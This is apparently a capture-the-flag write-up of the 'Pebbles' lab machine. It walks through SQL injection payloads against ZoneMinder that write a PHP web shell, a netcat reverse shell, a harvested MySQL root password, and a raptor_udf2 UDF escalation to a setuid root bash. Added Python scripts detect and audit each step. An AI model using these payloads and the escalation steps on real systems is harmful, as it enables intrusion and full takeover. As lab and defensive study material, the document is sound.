Machine Information
- Machine Name: Pebbles
- Machine Difficulty: easy
Information Gathering
Classic nmap time
```text
Nmap scan report for 192.168.225.52
Host is up, received user-set (0.016s latency).
Scanned at 2024-10-21 22:41:17 +08 for 111s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Pebbles
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Tomcat
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
```
There are a lot of web ports open. I then looked into all of them and found some interesting information.
Port 3305
```text
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.107.52:3305/FUZZ

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.107.52:3305/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

zm                      [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 25ms]
                        [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 24ms]
server-status           [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 15ms]
:: Progress: [220560/220560] :: Job [1/1] :: 1574 req/sec :: Duration: [0:02:08] :: Errors: 0 ::
```
After doing some enumeration, I found this `zm` directory, which seemed interesting.
After looking around the website, I found some useful information: the software name and version. I then googled it and managed to find this exploit. Since the application is vulnerable to SQL injection, it is possible to pull useful information out of the database or even get a shell with it.
```text
#Simple blind SQL injection
view=request&request=log&task=query&limit=100;(SELECT(SLEEP(10)))#
# for writing file into `/var/www/html`
view=request&request=log&task=query&limit=100;(SELECT+0x3c3f7068702073797374656d28245f4745545b305d293b3f3e+INTO+DUMPFILE+'/var/www/html/vuln.php')#
```
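To show what the second payload actually writes, and how a defender can spot both patterns in the web application's request log, here is an added Python example (mine, not part of the original post and not the application's own code). It decodes MySQL `0x...` string literals and flags the features of the two payloads above: a stacked statement after `;`, a `SLEEP()` timing primitive, an `INTO DUMPFILE` server-side file write, and a trailing comment that discards the rest of the original query. The sample request lines are constructed; only the parameter names follow the payloads above.

```python
import binascii
import re
from urllib.parse import unquote_plus

# Constructed sample query strings (not taken from any real log);
# the parameter names mirror the payloads discussed above.
SAMPLE_REQUESTS = [
    "view=request&request=log&task=query&limit=100",
    "view=request&request=log&task=query&limit=100;(SELECT(SLEEP(10)))#",
    "view=request&request=log&task=query&limit=100;(SELECT+0x3c3f7068702073797374656d28245f4745545b305d293b3f3e"
    "+INTO+DUMPFILE+'/var/www/html/vuln.php')#",
]

# MySQL hexadecimal string literal, e.g. 0x3c3f70...
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Indicator name -> pattern. Each corresponds to one feature of the payloads:
# a second statement after ';', a timing primitive, a server-side file
# write, and a comment that truncates the rest of the original query.
INDICATORS = [
    ("stacked_query", re.compile(r";\s*\(?\s*select\b", re.I)),
    ("time_based", re.compile(r"\bsleep\s*\(", re.I)),
    ("file_write", re.compile(r"\binto\s+(dump|out)file\b", re.I)),
    ("comment_terminator", re.compile(r"(#|--\s)\s*$")),
]


def decode_hex_literals(value):
    """Return the text behind every 0x... literal in value (best effort)."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        try:
            decoded.append(binascii.unhexlify(match.group(1)).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # odd-length or otherwise malformed literal
    return decoded


def split_query_string(query_string):
    """Split on '&' only and URL-decode each name and value ('+' becomes a space)."""
    pairs = []
    for part in query_string.split("&"):
        name, _, raw = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(raw)))
    return pairs


def analyse_request(query_string):
    """Return {param: {'indicators': [...], 'decoded_literals': [...]}} for suspicious params only."""
    findings = {}
    for name, value in split_query_string(query_string):
        hits = [tag for tag, pattern in INDICATORS if pattern.search(value)]
        if hits:
            findings[name] = {
                "indicators": hits,
                "decoded_literals": decode_hex_literals(value),
            }
    return findings


def scan_requests(query_strings):
    """Run analyse_request over many lines; return [(index, findings)] for hits only."""
    results = []
    for index, query_string in enumerate(query_strings):
        findings = analyse_request(query_string)
        if findings:
            results.append((index, findings))
    return results


if __name__ == "__main__":
    for index, findings in scan_requests(SAMPLE_REQUESTS):
        print(index, findings)
```

Decoding the literal is what makes the third request readable to an analyst: the hex is a small PHP command runner, and the `INTO DUMPFILE` target under the document root is the tell that a write to the web tree was attempted. The application-side fix is the usual one, a parameterised query for `limit` (or an integer cast before it reaches SQL), and the database-side one is a `secure_file_priv` setting that keeps `INTO DUMPFILE` out of directories the web server serves.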
I then used the SQL injection to write a PHP file that executes commands onto the machine, and called it.
Now that I could execute commands, it was time to get a reverse shell.
```text
nc -nvlp 3305
listening on [any] 3305 ...
connect to [192.168.45.181] from (UNKNOWN) [192.168.107.52] 59350
bash: cannot set terminal process group (1280): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pebbles:/var/www/html$ whoami
whoami
www-data
```
Now that I have a shell, it's time for privilege escalation.
Privilege Escalation
As usual, I started out with `linpeas.sh`, since it's a Linux machine.
```text
www-data@pebbles:/dev/shm$ ss -tulpn
Netid  State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
tcp    LISTEN  0       128     *:22                *:*
tcp    LISTEN  0       80      127.0.0.1:3306      *:*
tcp    LISTEN  0       128     :::8080             :::*
tcp    LISTEN  0       128     :::80               :::*
tcp    LISTEN  0       32      :::21               :::*
tcp    LISTEN  0       128     :::22               :::*
tcp    LISTEN  0       128     :::3305             :::*
```
I noticed that there's a port that is only reachable locally. I explored port 3306 and found that it is MySQL. To access it, I'll need credentials.
```text
www-data@pebbles:/tmp$ cat /etc/zm/zm.conf
...
# ZoneMinder database user
ZM_DB_USER=root
# ZoneMinder database password
ZM_DB_PASS=ShinyLucentMarker361
...
```
After getting the credentials, I could just log in to MySQL.
```text
www-data@pebbles:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| zm                 |
+--------------------+
5 rows in set (0.01 sec)
```
After wandering around this MySQL instance, I did not get anything useful from the database. I then remembered the UDF exploitation technique, which gives a root shell if successful. I then checked whether I have the privileges to do so.
```text
mysql> select * from mysql.user where user = substring_index(user(), '@', 1) \G ;
*************************** 1. row ***************************
                  Host: localhost
                  User: root
           Select_priv: Y
           Insert_priv: Y
           Update_priv: Y
           Delete_priv: Y
           Create_priv: Y
             Drop_priv: Y
           Reload_priv: Y
         Shutdown_priv: Y
          Process_priv: Y
             File_priv: Y
            Grant_priv: Y
       References_priv: Y
            Index_priv: Y
            Alter_priv: Y
          Show_db_priv: Y
            Super_priv: Y
 Create_tmp_table_priv: Y
      Lock_tables_priv: Y
          Execute_priv: Y
       Repl_slave_priv: Y
      Repl_client_priv: Y
      Create_view_priv: Y
        Show_view_priv: Y
   Create_routine_priv: Y
    Alter_routine_priv: Y
      Create_user_priv: Y
            Event_priv: Y
          Trigger_priv: Y
Create_tablespace_priv: Y
              ssl_type:
            ssl_cipher:
           x509_issuer:
          x509_subject:
         max_questions: 0
           max_updates: 0
       max_connections: 0
  max_user_connections: 0
                plugin: mysql_native_password
 authentication_string: *D11862AF9458F6F9B9C584C4606CFF81BA0DD442
      password_expired: N
 password_last_changed: 2020-06-22 12:53:18
     password_lifetime: NULL
        account_locked: N
1 row in set (0.00 sec)
```
It seems I have every privilege, because I'm logged in as the root user. I then compiled the needed file on my own host and uploaded it to the machine, since the machine does not have gcc.
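The privilege check above is exactly what an administrator should run against the account a web application uses, looking for the opposite answer. Here is an added Python example (mine, not from the original post) that parses the shape of the `\G` output above and of the `select * from mysql.func` listing shown further down, then reports the conditions that make UDF loading possible: the application using `root`, `FILE` (write the shared object into the plugin directory), `INSERT` and `CREATE ROUTINE` (register it), and `SUPER`. Both samples are constructed copies of that output shape, trimmed to the interesting columns; the list of privileges it checks is my own selection.

```python
# Constructed samples shaped like the MySQL client output in the post:
# a `\G` vertical row from mysql.user (trimmed to the interesting columns)
# and a boxed `select * from mysql.func` listing.
SAMPLE_USER_ROW = """\
*************************** 1. row ***************************
                  Host: localhost
                  User: root
           Select_priv: Y
           Insert_priv: Y
             File_priv: Y
            Super_priv: Y
   Create_routine_priv: Y
                plugin: mysql_native_password
 password_last_changed: 2020-06-22 12:53:18
1 row in set (0.00 sec)
"""

SAMPLE_FUNC_TABLE = """\
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
"""

# Privileges that together let a database account become an OS process on
# the server (selection is this audit's assumption, not a MySQL list).
UDF_RELEVANT_PRIVS = {
    "File_priv": "can read/write server files (LOAD_FILE, INTO DUMPFILE)",
    "Insert_priv": "can add rows to mysql.func, registering a UDF",
    "Create_routine_priv": "can CREATE FUNCTION ... SONAME",
    "Super_priv": "administrative catch-all",
}


def parse_vertical_row(text):
    """Parse one `\\G` row ('   key: value' lines) into a dict."""
    row = {}
    for line in text.splitlines():
        if line.startswith("*") or ":" not in line:
            continue  # row separator, blank line, or "N rows in set"
        key, _, value = line.partition(":")
        row[key.strip()] = value.strip()
    return row


def parse_box_table(text):
    """Parse the client's +---+ boxed table into a list of dicts keyed by header."""
    rows, header = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped.startswith("|"):
            continue  # border line or trailing status line
        cells = [c.strip() for c in stripped.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def audit_account(row):
    """Return human-readable findings for one mysql.user row."""
    findings = []
    if row.get("User") == "root":
        findings.append("application configured with the MySQL root account instead of a dedicated user")
    for priv, why in UDF_RELEVANT_PRIVS.items():
        if row.get(priv) == "Y":
            findings.append(f"{priv}=Y: {why}")
    return findings


def audit_udfs(func_rows, allowlist=frozenset()):
    """Names of registered UDFs not on the allowlist; mysql.func is empty on a stock install."""
    return [r["name"] for r in func_rows if r.get("name") not in allowlist]


if __name__ == "__main__":
    for finding in audit_account(parse_vertical_row(SAMPLE_USER_ROW)):
        print("account:", finding)
    for name in audit_udfs(parse_box_table(SAMPLE_FUNC_TABLE)):
        print("unexpected UDF:", name)
```

In practice the two queries are run by a scheduled job against every application account, and a non-empty `audit_udfs` result is an incident, not a finding. The mitigations follow directly from the findings: a dedicated database user with only the table privileges the application needs, and `secure_file_priv` set to a directory that is neither the plugin directory nor the web root.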
```sh
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
After everything is compiled, upload the file to the machine and run the statements accordingly.
```text
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql>
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('whoami');
+---------------------+
| do_system('whoami') |
+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)
```
I ran `whoami` to check whether I could execute commands, but there was no visible result, since the UDF runs the command inside the mysqld process and only returns the function's integer result, not the command's output. I then just tried a command with a side effect I could verify afterwards and hoped everything would go well.
```text
mysql> select do_system('chmod +s /bin/bash');
+---------------------------------+
| do_system('chmod +s /bin/bash') |
+---------------------------------+
|                               0 |
+---------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
www-data@pebbles:/dev/shm$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
```
It worked: `/bin/bash` now has the sticky bit set, which means I can use `/bin/bash -p` to get a root shell.
```text
www-data@pebbles:/dev/shm$ /bin/bash -p
bash-4.3# whoami
root
```
That's how I got my root user ~
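As a detection-side counterpart to the `chmod +s /bin/bash` step, here is an added Python example (mine, not from the original post) that inventories regular files carrying the setuid or setgid bit (the `s` in a mode such as `-rwsr-sr-x`) under a root directory, stores that inventory as a JSON baseline, and reports anything that has gained the bit since. `demo()` builds a constructed throwaway directory standing in for `/`, with a legitimately setuid `passwd` in the baseline and `bash` made setuid afterwards, so the script runs anywhere; pointing `find_setuid_files` at `/` and scheduling the comparison is the real-world use.

```python
import json
import os
import stat
import tempfile


def find_setuid_files(root):
    """Return {relative path: mode string} for regular files under root that
    carry the setuid or setgid bit (the 's' in a mode like -rwsr-sr-x)."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # vanished or unreadable entry; skip rather than abort
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits[os.path.relpath(path, root)] = stat.filemode(st.st_mode)
    return hits


def save_baseline(path, hits):
    with open(path, "w") as fh:
        json.dump(hits, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def diff_against_baseline(current, baseline):
    """Return (added, removed, changed): paths that gained the bit since the
    baseline, paths that lost it, and paths whose mode string differs."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(current) & set(baseline) if current[p] != baseline[p])
    return added, removed, changed


def demo():
    """Constructed fixture: a temp directory standing in for '/', with a
    legitimately setuid 'passwd' in the baseline and 'bash' made setuid later."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        for name in ("bash", "ls", "passwd"):
            p = os.path.join(bindir, name)
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(p, 0o755)
        os.chmod(os.path.join(bindir, "passwd"), 0o4755)  # expected setuid binary

        baseline_file = os.path.join(root, "setuid-baseline.json")
        save_baseline(baseline_file, find_setuid_files(root))

        # The post-compromise change: equivalent of `chmod +s /bin/bash`
        os.chmod(os.path.join(bindir, "bash"), 0o6755)

        return diff_against_baseline(find_setuid_files(root), load_baseline(baseline_file))


if __name__ == "__main__":
    added, removed, changed = demo()
    print("added:", added)
    print("removed:", removed)
    print("changed:", changed)
```

The baseline should be generated on a known-good host and kept off the box it describes, otherwise the same access that flips the bit can also edit the baseline. A file integrity monitor or the package manager's verification does the same comparison more thoroughly; this script shows the minimum that catches the change made above.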
Things I learned from this machine
- Blind SQL injection to RCE in MySQL
- UDF exploitation (I can compile on my own host machine if there's no gcc on the victim machine)
- Very important: make sure to use a port that is open on the victim machine to transfer files
  - e.g. port 8000 was not open on the victim machine, so file transfers and nc did not work on that port